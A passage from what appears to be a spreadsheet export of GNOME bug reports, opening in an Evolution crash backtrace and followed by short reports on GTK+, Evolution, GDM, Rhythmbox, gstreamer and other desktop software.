#9  0x08098ad7 in build_flat (ml=0x84bec20 summary=0x41e005b4 
    changes=0x827f7a8) at message-list.c:1712
#10 0x08099e3d in regen_list_regened (mm=0x8408220) at message-list.c:2464
#11 0x0808d450 in mail_msgport_replied (source=0x811af40 cond=G_IO_IN 
    d=0x811ad90) at mail-mt.c:264
#12 0x4058ba7a in g_io_unix_dispatch (source_data=0x811af58 
    current_time=0xbfffef30 user_data=0x811ad90) at giounix.c:137
#13 0x4058d055 in g_main_dispatch (dispatch_time=0xbfffef30) at gmain.c:656
#14 0x4058d659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#15 0x4058d725 in g_main_iteration (block=1) at gmain.c:907
#16 0x404a289b in gtk_main_iteration () at gtkmain.c:603
#17 0x40989435 in process_events (servant=0x8507484) at bonobo-control.c:459
#18 0x408b5129 in _ORBIT_skel_Bonobo_Control_unrealize (
    _ORBIT_servant=0x8507484 _ORBIT_recv_buffer=0x811a8f8 ev=0xbffff000 
    _impl_unrealize=0x40989458 )
    at Bonobo-skels.c:6479
#19 0x40932146 in ORBit_POA_handle_request (recv_buffer=0x811a8f8 
    poa=0x810faa8) at orbit_poa.c:507
#20 0x40935193 in ORBit_handle_incoming_request (recv_buffer=0x811a8f8)
    at server.c:90
#21 0x4093548b in ORBit_handle_incoming_message (recv_buffer=0x811a8f8)
    at server.c:160
#22 0x4094f09e in giop_recv_reply_buffer_use_multiple_2 (
    request_cnx=0x811d7f0 request_ids=0xbffff108 block_for_reply=1)
    at giop-msg-buffer.c:1026
#23 0x4094f15b in giop_recv_reply_buffer_use_2 (request_cnx=0x811d7f0 
    request_id=3221222816 block_for_reply=1) at giop-msg-buffer.c:1062
#24 0x407f2bf5 in GNOME_Evolution_Activity_operationStarted (_obj=0x811d660 
    component_id=0x84e9758 0x84f43f0 icon=0x84e6a6c 
    information=0x8435fd8 Storing folder 'Mail from cc:Mail Link to SMTP Administrator' cancellable=1 '\001' event_listener=0x84a5af4 
    activity_id=0x845c380 suggest_display=0xbffff60f @ ev=0xbffff610)
    at Evolution-stubs.c:241
#25 0x407fec22 in evolution_activity_client_construct (
    activity_client=0x851f0c0 shell_client=0x811d798 
    component_id=0x84e9758 0x84f43f0 animated_icon=0x80e0464 
    information=0x8435fd8 Storing folder 'Mail from cc:Mail Link to SMTP Administrator' cancellable=1 suggest_display_return=0xbffff738)
    at evolution-activity-client.c:356
#26 0x407fed9f in evolution_activity_client_new (shell_client=0x811d798 
    component_id=0x84e9758 0x84f43f0 animated_icon=0x80e0464 
    information=0x8435fd8 Storing folder 'Mail from cc:Mail Link to SMTP Administrator' cancellable=1 suggest_display_return=0xbffff738)
    at evolution-activity-client.c:398
#27 0x0808e04a in do_op_status (mm=0x84f4490) at mail-mt.c:819
#28 0x0808d4a4 in mail_msgport_received (source=0x811afc8 cond=G_IO_IN 
    d=0x811af70) at mail-mt.c:286
#29 0x4058ba7a in g_io_unix_dispatch (source_data=0x811afe0 
    current_time=0xbffff810 user_data=0x811af70) at giounix.c:137
#30 0x4058d055 in g_main_dispatch (dispatch_time=0xbffff810) at gmain.c:656
#31 0x4058d659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#32 0x4058d7e8 in g_main_run (loop=0x80f7e00) at gmain.c:935
#33 0x404a265b in gtk_main () at gtkmain.c:524
#34 0x408c4547 in bonobo_main () at bonobo-main.c:283
#35 0x08096799 in main (argc=3 argv=0xbffffa34) at main.c:141
#36 0x40a816b7 in __libc_start_main (main=0x8096614  argc=3 
    ubp_av=0xbffffa34 init=0x8064e28  fini=0x80ca00c  
    rtld_fini=0x4000db64  stack_end=0xbffffa2c)
    at ../sysdeps/generic/libc-start.c:129
Thread 5 (Thread 5124 (LWP 1154)):
#0  0x40a937c5 in __sigsuspend (set=0x42d4290c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406ca0a9 in __pthread_wait_for_restart_signal (self=0x42d42be0)
    at pthread.c:967
#2  0x406c6c0c in pthread_cond_wait (cond=0x811b138 mutex=0x811b118)
    at restart.h:34
#3  0x40081780 in e_msgport_wait (mp=0x811b0f0) at e-msgport.c:193
#4  0x40081ea7 in thread_dispatch (din=0x811b0a0) at e-msgport.c:514
#5  0x406c7bcc in pthread_start_thread (arg=0x42d42be0) at manager.c:274
Thread 4 (Thread 2051 (LWP 1135)):
#0  0x40a937c5 in __sigsuspend (set=0x41ce790c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406ca0a9 in __pthread_wait_for_restart_signal (self=0x41ce7be0)
    at pthread.c:967
#2  0x406c6c0c in pthread_cond_wait (cond=0x811b138 mutex=0x811b118)
    at restart.h:34
#3  0x40081780 in e_msgport_wait (mp=0x811b0f0) at e-msgport.c:193
#4  0x40081ea7 in thread_dispatch (din=0x811b0a0) at e-msgport.c:514
#5  0x406c7bcc in pthread_start_thread (arg=0x41ce7be0) at manager.c:274
Thread 3 (Thread 1026 (LWP 1134)):
#0  0x40a937c5 in __sigsuspend (set=0x414b990c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406ca0a9 in __pthread_wait_for_restart_signal (self=0x414b9be0)
    at pthread.c:967
#2  0x406c6c0c in pthread_cond_wait (cond=0x811b090 mutex=0x811b070)
    at restart.h:34
#3  0x40081780 in e_msgport_wait (mp=0x811b048) at e-msgport.c:193
#4  0x40081ea7 in thread_dispatch (din=0x811aff8) at e-msgport.c:514
#5  0x406c7bcc in pthread_start_thread (arg=0x414b9be0) at manager.c:274
Thread 2 (Thread 2049 (LWP 1133)):
#0  0x40b49f27 in __poll (fds=0x8129eec nfds=1 timeout=2000)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#1  0x406c78c0 in __pthread_manager (arg=0x1b) at manager.c:139
Thread 1 (Thread 1024 (LWP 1123)):
#0  0x40b1ef19 in __wait4 () from /lib/i686/libc.so.6
#1  0x40b997e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x406cc543 in waitpid (pid=1603 stat_loc=0xbfffea1c options=0)
    at wrapsyscall.c:172
#3  0x402fa262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x080965ea in segv_redirect (sig=11) at main.c:67
#5  0x406ca905 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 2110 edi = 0 esi = 139236816 ebp = 3221220856 esp = 3221220832 ebx = 1079633548 edx = 138333792 ecx = 139610408 eax = 0 trapno = 14 err = 4 eip = 1079550126 cs = 35 __csh = 0 eflags = 2163335 esp_at_signal = 3221220832 ss = 43 __ssh = 0 fpstate = 0xbfffeb60 oldmask = 2147483648 cr2 = 0})
    at signals.c:97
#6  
#7  0x4058a0ae in g_hash_table_foreach (hash_table=0x8524928 
    func=0x8098220  user_data=0x84bec20) at ghash.c:299
#8  0x0809826d in clear_tree (ml=0x84bec20) at message-list.c:1286
#9  0x08098ad7 in build_flat (ml=0x84bec20 summary=0x41e005b4 
    changes=0x827f7a8) at message-list.c:1712
#10 0x08099e3d in regen_list_regened (mm=0x8408220) at message-list.c:2464
#11 0x0808d450 in mail_msgport_replied (source=0x811af40 cond=G_IO_IN 
    d=0x811ad90) at mail-mt.c:264
#12 0x4058ba7a in g_io_unix_dispatch (source_data=0x811af58 
    current_time=0xbfffef30 user_data=0x811ad90) at giounix.c:137
#13 0x4058d055 in g_main_dispatch (dispatch_time=0xbfffef30) at gmain.c:656
#14 0x4058d659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#15 0x4058d725 in g_main_iteration (block=1) at gmain.c:907
#16 0x404a289b in gtk_main_iteration () at gtkmain.c:603
#17 0x40989435 in process_events (servant=0x8507484) at bonobo-control.c:459
#18 0x408b5129 in _ORBIT_skel_Bonobo_Control_unrealize (
    _ORBIT_servant=0x8507484 _ORBIT_recv_buffer=0x811a8f8 ev=0xbffff000 
    _impl_unrealize=0x40989458 )
    at Bonobo-skels.c:6479
#19 0x40932146 in ORBit_POA_handle_request (recv_buffer=0x811a8f8 
    poa=0x810faa8) at orbit_poa.c:507
#20 0x40935193 in ORBit_handle_incoming_request (recv_buffer=0x811a8f8)
    at server.c:90
#21 0x4093548b in ORBit_handle_incoming_message (recv_buffer=0x811a8f8)
    at server.c:160
#22 0x4094f09e in giop_recv_reply_buffer_use_multiple_2 (
    request_cnx=0x811d7f0 request_ids=0xbffff108 block_for_reply=1)
    at giop-msg-buffer.c:1026
#23 0x4094f15b in giop_recv_reply_buffer_use_2 (request_cnx=0x811d7f0 
    request_id=3221222816 block_for_reply=1) at giop-msg-buffer.c:1062
#24 0x407f2bf5 in GNOME_Evolution_Activity_operationStarted (_obj=0x811d660 
    component_id=0x84e9758 0x84f43f0 icon=0x84e6a6c 
    information=0x8435fd8 Storing folder 'Mail from cc:Mail Link to SMTP Administrator' cancellable=1 '\001' event_listener=0x84a5af4 
    activity_id=0x845c380 suggest_display=0xbffff60f @ ev=0xbffff610)
    at Evolution-stubs.c:241
#25 0x407fec22 in evolution_activity_client_construct (
    activity_client=0x851f0c0 shell_client=0x811d798 
    component_id=0x84e9758 0x84f43f0 animated_icon=0x80e0464 
    information=0x8435fd8 Storing folder 'Mail from cc:Mail Link to SMTP Administrator' cancellable=1 suggest_display_return=0xbffff738)
    at evolution-activity-client.c:356
#26 0x407fed9f in evolution_activity_client_new (shell_client=0x811d798 
    component_id=0x84e9758 0x84f43f0 animated_icon=0x80e0464 
    information=0x8435fd8 Storing folder 'Mail from cc:Mail Link to SMTP Administrator' cancellable=1 suggest_display_return=0xbffff738)
    at evolution-activity-client.c:398
#27 0x0808e04a in do_op_status (mm=0x84f4490) at mail-mt.c:819
#28 0x0808d4a4 in mail_msgport_received (source=0x811afc8 cond=G_IO_IN 
    d=0x811af70) at mail-mt.c:286
#29 0x4058ba7a in g_io_unix_dispatch (source_data=0x811afe0 
    current_time=0xbffff810 user_data=0x811af70) at giounix.c:137
#30 0x4058d055 in g_main_dispatch (dispatch_time=0xbffff810) at gmain.c:656
#31 0x4058d659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#32 0x4058d7e8 in g_main_run (loop=0x80f7e00) at gmain.c:935
#33 0x404a265b in gtk_main () at gtkmain.c:524
#34 0x408c4547 in bonobo_main () at bonobo-main.c:283
#35 0x08096799 in main (argc=3 argv=0xbffffa34) at main.c:141
#36 0x40a816b7 in __libc_start_main (main=0x8096614  argc=3 
    ubp_av=0xbffffa34 init=0x8064e28  fini=0x80ca00c  
    rtld_fini=0x4000db64  stack_end=0xbffffa2c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40b1ef19 in __wait4 () from /lib/i686/libc.so.6
#0  0x40b1ef19 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x40b997e4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x406cc543 in waitpid (pid=1603 stat_loc=0xbfffea1c options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbfffea1c
options = 0
result = 0
oldtype = 0
#3  0x402fa262 in gnome_segv_handle (signum=11) at gnome-init.c:659
	in gnome-init.c
estatus = 1075439588
in_segv = 1
pid = 0
#4  0x080965ea in segv_redirect (sig=11) at main.c:67
	in main.c
sig = 11
#5  0x406ca905 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 2110 edi = 0 esi = 139236816 ebp = 3221220856 esp = 3221220832 ebx = 1079633548 edx = 138333792 ecx = 139610408 eax = 0 trapno = 14 err = 4 eip = 1079550126 cs = 35 __csh = 0 eflags = 2163335 esp_at_signal = 3221220832 ss = 43 __ssh = 0 fpstate = 0xbfffeb60 oldmask = 2147483648 cr2 = 0})
    at signals.c:97
	in signals.c
signo = 0
__value = 0x80965c8 U\211Ã¥SP\213]\bÃ¨\e\026Ã½Ã¿\213\025ÃF\016\b9Ãu\025\203Ã¬\fSÂ¡Â°@\016\bÃ¿Ã\203Ã„\020\213]Ã¼Ã‰Ãƒ\211Ã¶\203Ã¬\bSRÃ¨bÃ¾Ã¼Ã¿\203Ã„\020Ã‡E\b
#6  
No locals.
#7  0x4058a0ae in g_hash_table_foreach (hash_table=0x8524928 
    func=0x8098220  user_data=0x84bec20) at ghash.c:299
	in ghash.c
node = (GHashNode *) 0x84c95d0
i = 0
Unknown reporter: bobb@newhousecom.com changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>bobb</t>
  </si>
  <si>
    <t>TOMBOY-409940</t>
  </si>
  <si>
    <t>Tomboy should use po/LINGUAS instead of ALL_LINGUAS in configure.ac. Let me know if I should cook up a patch.</t>
  </si>
  <si>
    <t>GTK+-314348</t>
  </si>
  <si>
    <t>gtk_init ()  deletes command line arguments consisting of  - or --</t>
  </si>
  <si>
    <t>Please describe the problem:
If the commandline arguments contain a standalone - or -- these arguments are
deleted by a call to gtk_init(&amp;argc&amp;argv). The value of argc is decremented.
This problem occurrs in 2.6.7 but not with 2.2x or 2.4x
Steps to reproduce:
1. Run the test program below and include a - in the command argument list
2. test_arg 1 2 - 3 4
3. Note that the command line arguments are different before and after the call :(
/*  
   gcc -O0 -g -Wall test_arg.c `pkg-config gtk+-2.0 --cflags --libs` -lm -o
test_arg 
  2005-08-24 clw
*/
#include 
#include 
#include 
#include 
int main(int argc char **argv){
  int i
  printf(\nbefore gtk_init argc: %d\nargc)
  for(i=0 i &lt; argc i++)printf(arg number: %2d  value: %s\niargv[i])
  gtk_init(
  printf(\nafter gtk_init argc:  %d\nargc)
  for(i=0 i &lt; argc i++)printf(arg number: %2d  value: %s\niargv[i])
  exit(0)
}
With GTK+-2.2 GTK+2.4.9:
$ test_arg 1 - 3   
before gtk_init argc: 4
arg number:  0  value: ./test_arg
arg number:  1  value: 1
arg number:  2  value: -
arg number:  3  value: 3
after gtk_init argc:  4
arg number:  0  value: ./test_arg
arg number:  1  value: 1
arg number:  2  value: -
arg number:  3  value: 3
With GTK 2.6.7 on Fedora Core 4
$ test_arg 1 - 3   
before gtk_init argc: 4
arg number:  0  value: ./test_arg
arg number:  1  value: 1
arg number:  2  value: -
arg number:  3  value: 3
after gtk_init argc:  3
arg number:  0  value: ./test_arg
arg number:  1  value: 1
arg number:  2  value: 3
NOTE that the - is GONE and has been deleted by gtk_init().
Actual results:
The test program prints outthe command line argument count and values both
before and after a call to gtk_init.  I rely on argc and argv not being changed
by a call
to gtk_init().
Expected results:
The command line argument count and values should not change in a call to
gtk_init(). Specifically if  - is an command line argument it should NOT be
deleted.
Does this happen every time?
yes  gtk 2x version dependent
Other information:
I can move the call to gtk_init later in the program to avoid the problem but
it means many changes in my code</t>
  </si>
  <si>
    <t>GNOME-VFS-322988</t>
  </si>
  <si>
    <t>ifdef HAVE_SYS_INOTIFY_H problem</t>
  </si>
  <si>
    <t>config.h gets generated with :-
===================================================
/* Define to 1 if you have the  header file. */
#define HAVE_LINUX_INOTIFY_H 1
/* Define to 1 if you have the  header file. */
===================================================
In inotify-helper.c &amp; inotify-kernel.c the following test results in linux/inotify.h being included but it 
doesn't have IN_ISDIR  IN_DELETE IN_CREATE so compile error results. I just removed the #ifdef 
HAVE_SYS_INOTIFY_H to get a clean compile.
=========================================================
#ifdef HAVE_SYS_INOTIFY_H
/* We don't actually include the libc header because there has been
 * problems with libc versions that was built without inotify support.
 * Instead we use the local version.
 */
#include local_inotify.h
#elif defined (HAVE_LINUX_INOTIFY_H)
#include 
#endif
================================================</t>
  </si>
  <si>
    <t>PANGO-151689</t>
  </si>
  <si>
    <t>Mprefix not working properly</t>
  </si>
  <si>
    <t>Test data and diff for fix attached</t>
  </si>
  <si>
    <t>EVOLUTION-215385</t>
  </si>
  <si>
    <t>From lines mbox message bodies not grokk'ed correctly</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Receiving messages with embedded ^From lines in the body of the message
to a Evolution mailbox configured for a Standard Unix mbox format 
file does get grokked correctly.
Evolution incorrectly believes that a new message has begun even
if the line isn't the correct From line syntax. For example a coworker
sent a message with the body From now on I will be telecommuting on
Wednesdays.
Evolution thought a new message started at this line instead of 
realizing it is part of the body.
Steps to reproduce the problem:
1. Configure Evolution with a Standard Unix mbox format mailbox.
2. Have someone send you a message from dtmail for example with the
   body From now on I will be telecommuting on Wednesdays.
3. View the received message in Evolution.
Actual Results:
In the message list box I see two messages
From			Subject				Sent
Joe Mocker 	telecommute			12:31 PM
							?
Notice the info for the second message is nearly all blank.
When I bring up the first message the body after the ^From line
is blank
When I bring up the second message It contains the rest of the
body. Although the Date field is set to 31 Dec 1969 23:59:59 +0000
Expected Results:
Only one new message shows up with the entire body.
How often does this happen? 
Every time.</t>
  </si>
  <si>
    <t>creechy</t>
  </si>
  <si>
    <t>GDM-334186</t>
  </si>
  <si>
    <t>Missing gdmsetup features</t>
  </si>
  <si>
    <t>I am creating this bug to be a single place to mention all config features that should be available in gdmsetup that are not.  This way I can close a number of bugs.  It is better to fix these all at once if possible.
I think we need to add back a General tab since many of these features don't
fit into Local/Remote/a11y/Security/Users.   To fit the HIG we can only add one more tab.
+ Should be able to disable multiple logins from a single user
  (AlwaysLoginCurrentSession key).  Probably General tab.  This is just
  a checkbox to add.
+ Should be able to specify default session (DefaultSession key).  Probably
  General tab.  This should be a dropdown selection with the available
  sessions.  Require a bit of work to add logic to gdmsetup to lookup
  existing sessions.
+ Should be able to specify priority in the [server-foo] section.  Probably
  should be a spinbutton.  See Configure X Server button on Security tab.
+ Should be able to specify AlwaysRestartServer value since many users like
  to set this.  Probably General tab.  This is just a checkbox to add.
  Might want to include some text explaining that this is useful to turn on
  if users find the Xserver crashes or hogs resources if left running for
  a long time.
+ Should be able to specify Halt/Shutdown/Reboot command.  Probably 
  General tab or maybe Security tab since that's where you specify whether
  the SystemMenu is visible or not.  This would just be string entries.
+ Should be able to specify RelaxPermissions and CheckDirOwner value since 
  many users have facedirs etc. mounted over NFS and want the face browser 
  to work.  Should be on Security tab.  Same goes for NeverPlaceCookiesOnNFS.
  Security tab.  Relax Permissions is a drop down with 3 selections that
  correspond to 012 in the config file (see comments for descriptions).
  CheckDirOwner is a checkbox as is NeverPlaceCookiesOnNFS.
+ Should be able to specify GtkRC file since it would be nice if users
  could specify the GTK+ theme to use for gdmlogin.  This also affects 
  the GTK+ elements in gdmgreeter (entry F10/Options menu etc.) so should
  go in General tab.  Probably should be a file selection dialog.
+ Should be able to specify MinimalUID DefaultFace and GlobalFaceDir
  for better FaceBrowser management.  Should go in Users tab.
  MinimalUID coudl be a spinbutton.  DefaultFace and GlobalFaceDir
  are file selection dialogs.
+ Should be able to set UseCirclesInEntry/UseInvisibleEntry to configure
  how password should look as entered.  Probably General tab.  Both are
  checkboxes.
+ Should be able to specify Use24HourClock since users like to change
  this.  General tab.  This is a checkbox.
Not so easy:
+ Should be able to specify Quiver value since lots of users don't like
  this.  Should go in Local/Remote tab when gdmlogin is picked since this
  only affects gdmlogin.  This is a checkbox.  This isn't so easy since
  the Local/Remote tab is a bit dynamic.
+ Should be able to specify LockPosition/SetPosition/PositionX/PositionY
  for gdmlogin.  Should go in Local/Remote tab when gdmlogin is picked.
  These are checkboxes or int entry values that could be spinbuttons.
+ Should be able to set ChooserButton to turn off the ability to launch
  gdmchooser from login screen.  Also would be nice to be able to set the
  various [chooser] config options though not sure what tab this belongs in.
Hard:
+ Should be able to create new users in gdmsetup.  Probably Users tab.
  Note that the about-me applet has logic to do this perhaps it could be
  ported into GDM?
There's probably more that could be added but that's a pretty good list to
start with and captures a lot of the issues that I think are important.</t>
  </si>
  <si>
    <t>WEBSITE-528874</t>
  </si>
  <si>
    <t>library.g.o: Please add gnome-lirc-properties</t>
  </si>
  <si>
    <t>Could you please add gnome-lirc-properties' user guide to library.gnome.org? Thanks.</t>
  </si>
  <si>
    <t>GNOME-USER-DOCS-413456</t>
  </si>
  <si>
    <t>Missing reference to default Evolution icon on top panel</t>
  </si>
  <si>
    <t>Documentation 
Section:  in gospanel.xml 
By default the top edge panel contains the following objects:
 * Menu Bar applet ...
 * Web Browser Launcher ...
 * Notification Area applet ...
Correct version:
By default the top edge panel contains the following objects:
 * Menu Bar applet ...
 * Web Browser launcher ...
 * Groupware Suite launcher ...
 * Notification Area applet ...
(The Evolution launcher is added by default on top panel)
Other information:
Or Email Client?? Dunno.
BTW note that it's using
   Web Browser Launcher
while it should be IMHO
   Web Browser launcher</t>
  </si>
  <si>
    <t>EVINCE-301070</t>
  </si>
  <si>
    <t>Sidebar appears coming out of fullscreen mode</t>
  </si>
  <si>
    <t>If you open a ps file (and so the sidebar is turned off) and then go into and
come out of fullscreen mode the sidebar appears. I see the sidebar menu entry
is disabled but checked however I can remove the sidebar by closing it manually.</t>
  </si>
  <si>
    <t>GNOME-BUILDER-774073</t>
  </si>
  <si>
    <t>Buffer corruption when tabbing between function parameters</t>
  </si>
  <si>
    <t>After performing an autocompletion - say fread() - the highlighting seems to indicate that you can tab between the parameters. But if you do this the editor buffer gets corrupted and you basically have to delete the whole completion.</t>
  </si>
  <si>
    <t>npmccallum</t>
  </si>
  <si>
    <t>RHYTHMBOX-336912</t>
  </si>
  <si>
    <t>Self-emptying automatic playlist with browser</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Create an automatic playlist with playcount == 0
2. With the playlist selected show browser and filter on artist/album
3. Hit play the songs list empties itself as the songs are played as expected
4. When the last song ends rhythmbox crashes instead of setting itself idle
Stack trace:
(only main thread as there were too many threads)
#0  0x0808ed8b in rb_source_can_pause ()
#1  0x08079c13 in rb_shell_player_playpause ()
#2  0x08079686 in rb_shell_player_pause ()
#3  0x0807970b in rb_shell_player_stop ()
#4  0x08079a67 in rb_shell_player_set_playing_source ()
#5  0x0807a3f8 in rb_shell_player_do_next ()
#6  0x0807b90d in rb_shell_player_get_playing_song_duration ()
#7  0xb728a423 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#8  0xb727e79f in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#9  0xb728d4de in signal_emit_unlocked_R () from /usr/lib/libgobject-2.0.so.0
#10 0xb728eae9 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#11 0xb728ee59 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#12 0x080b7435 in rb_player_open ()
#13 0xb72ce1c9 in gst_bus_source_dispatch (source=0x87a60f0
    callback=0x80b73a0  user_data=0x0) at gstbus.c:622
#14 0xb70c57d7 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#15 0xb70c8896 in g_main_context_iterate () from /usr/lib/libglib-2.0.so.0
#16 0xb70c8bb8 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#17 0xb7407477 in bonobo_main () from /usr/lib/libbonobo-2.so.0
#18 0x0806efd6 in main ()
Other information:
Log of rhythmbox --debug on the last song of the filtered automatic playlist:
(14:10:29) [0x813c890] [eos_cb] rb-shell-player.c:2345: eos!
(14:10:29) [0x813c890] [rb_shell_player_do_next] rb-shell-player.c:1460: No next
entry stopping playback
(14:10:29) [0x813c890] [rb_shell_player_set_playing_source_internal]
rb-shell-player.c:2133: setting playing source to (nil)
(14:10:29) [0x813c890] [rb_shell_playing_from_queue_cb] rb-shell.c:1789: playing
from queue changed
(14:10:29) [0x813c890] [rb_shell_player_set_playing_source_internal]
rb-shell-player.c:2158: source is already playing stopping it
(14:10:29) [0x813c890] [rb_shell_player_stop] rb-shell-player.c:2206: stopping
(14:10:29) [0x813c890] [rb_shell_player_playpause] rb-shell-player.c:1573: doing
playpause
Segmentation fault</t>
  </si>
  <si>
    <t>rached</t>
  </si>
  <si>
    <t>PYGOBJECT-121611</t>
  </si>
  <si>
    <t>gtk.gdk.Pixbuf.fill argument is guint should be guint32</t>
  </si>
  <si>
    <t>well I think the summary explains it all. gtk.gdk.Pixbuf.fill takes an
RGBA pixel value but the current guint argument translates into a python
int which can exceed 0x7fffffff making this function kind of useless.</t>
  </si>
  <si>
    <t>hyriand</t>
  </si>
  <si>
    <t>GNOME-PRINT-409738</t>
  </si>
  <si>
    <t>uninitialized variable in libgnomeprint/gnome-print-filter.c</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. build with gcc -Wuninitialized
and see this:
gnome-print-filter.c: In function 'reset_impl':
gnome-print-filter.c:724: warning: unused variable 'n'
gnome-print-filter.c: In function 'gnome_print_filter_description_rec':
gnome-print-filter.c:1149: warning: 't' may be used uninitialized in this functi
on
gnome-print-filter.c: In function 'gnome_print_filter_set_property':
gnome-print-filter.c:137: warning: 'va' is used uninitialized in this function
The warning about 't' doesn't look like an actual problem but the warning about 'va' does.
Stack trace:
Other information:</t>
  </si>
  <si>
    <t>EVOLUTION-438613</t>
  </si>
  <si>
    <t>improve permission denied error message in calendar/addressbook</t>
  </si>
  <si>
    <t>http://svn.gnome.org/viewcvs/evolution/trunk/addressbook/gui/widgets/eab-gui-util.c?revision=33432
/* E_BOOK_ERROR_PERMISSION_DENIED */  N_(Permission denied)
when i reopen an appointment and change the calendar source to some read-only calendar (B&amp;A) i get that error message.
it's a stupid error message that does not help anybody - what did i do wrong? why? at least tell me that it is a read-only calendar.
related to bug 329594.</t>
  </si>
  <si>
    <t>RHYTHMBOX-122839</t>
  </si>
  <si>
    <t>The source panel grows continually.</t>
  </si>
  <si>
    <t>When in the full view the source panel at the left side grows continually
and everything else gets smaller.  It didn't do this when i first used
rhythmbox and it's persistent because it keeps doing it after i
close/restart rhythmbox.</t>
  </si>
  <si>
    <t>kirtis_b</t>
  </si>
  <si>
    <t>GSTREAMER-305505</t>
  </si>
  <si>
    <t>Fail to compile plugin spc</t>
  </si>
  <si>
    <t>Please describe the problem:
Making all in spc
make[3]: Entering directory `/root/gstreamer/src/gst-plugins-0.8.9/ext/spc'
if /bin/sh ../../libtool --mode=compile --tag=CC gcc -DHAVE_CONFIG_H -I. -I.
-I../..    -I../../gst-libs -I../../gst-libs -D_LARGEFILE_SOURCE
-D_FILE_OFFSET_BITS=64 -pthread -I/usr/local/include/gstreamer-0.8
-I/usr/local/include/glib-2.0 -I/usr/local/lib/glib-2.0/include
-I/usr/include/libxml2   -DGST_DISABLE_DEPRECATED  -Wall -g -O2 -MT
libgstspc_la-gstspc.lo -MD -MP -MF .deps/libgstspc_la-gstspc.Tpo -c -o
libgstspc_la-gstspc.lo `test -f 'gstspc.c' || echo './'`gstspc.c \
then mv -f .deps/libgstspc_la-gstspc.Tpo .deps/libgstspc_la-gstspc.Plo else
rm -f .deps/libgstspc_la-gstspc.Tpo exit 1 fi
 gcc -DHAVE_CONFIG_H -I. -I. -I../.. -I../../gst-libs -I../../gst-libs
-D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -pthread
-I/usr/local/include/gstreamer-0.8 -I/usr/local/include/glib-2.0
-I/usr/local/lib/glib-2.0/include -I/usr/include/libxml2
-DGST_DISABLE_DEPRECATED -Wall -g -O2 -MT libgstspc_la-gstspc.lo -MD -MP -MF
.deps/libgstspc_la-gstspc.Tpo -c gstspc.c  -fPIC -DPIC -o
.libs/libgstspc_la-gstspc.o
make[3]: *** No rule to make target `APU.o' needed by `libgstspc.la'.  Stop.
make[3]: Leaving directory `/root/gstreamer/src/gst-plugins-0.8.9/ext/spc'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/root/gstreamer/src/gst-plugins-0.8.9/ext'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/root/gstreamer/src/gst-plugins-0.8.9'
make: *** [all] Error 2
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>lipeng</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-147452</t>
  </si>
  <si>
    <t>Setting URL handler doesn't work</t>
  </si>
  <si>
    <t>1.  Go to Preferred Applications.
2.  Select Custom Web Browser and enter firefox %s.
Instead of getting firefox I get either epiphany or galeon depending on what I
have previously selected when experimenting and using a browser from the dropdown.  
Also every time I enter this dialog neither Select a Web Browser nor Custom
Web Browser is selected.  Ditto for Mail Reader neither option is selected. 
Note that I upgraded from GARNOME 2.6.1 to GARNOME 2.6.2 when this started
happening.  I didn't delete any of my GNOME dot files... should I even when
upgrading from 2.6.1 to 2.6.2?</t>
  </si>
  <si>
    <t>TOTEM-522548</t>
  </si>
  <si>
    <t>[YouTube browser] The throbber is not displayed once the search is validate by pressing the enter key if the pointer stands over the Search field</t>
  </si>
  <si>
    <t>Please describe the problem:
User can't know if Totem has recorded its demand since the throbber is not displayed once the search is validate by pressing the enter key if the pointer stands over the Search field : 
Totem seems to be inactive whereas displaying the throbber should indicate that Totem actually is performing the searching task
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Throbber is not displayed
Expected results:
Throbber should be displayed to let the user know that his command has been validate and that the task is running
Does this happen every time?
yes
Other information:</t>
  </si>
  <si>
    <t>DIA-447094</t>
  </si>
  <si>
    <t>ER-Diagram: weak entity isn't weak</t>
  </si>
  <si>
    <t>Please describe the problem:
This bug has been reported to Ubuntu: 
https://bugs.launchpad.net/ubuntu/+source/dia/+bug/85885
Steps to reproduce:
If I add from the ER-sheet a weak entity I get a normal entity. The only way to get a weak is to set the weak attribute manual over the properties menu.
Actual results:
A normal entity box appears.
Expected results:
A weak entity box appears.
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>asisak</t>
  </si>
  <si>
    <t>EVOLUTION-205074</t>
  </si>
  <si>
    <t>excessive icon changing slows startup thrashes X server</t>
  </si>
  <si>
    <t>During startup Evolution appears to be setting and resetting the main
shell window's icon numerous times in rapid succession.  This thrashes the
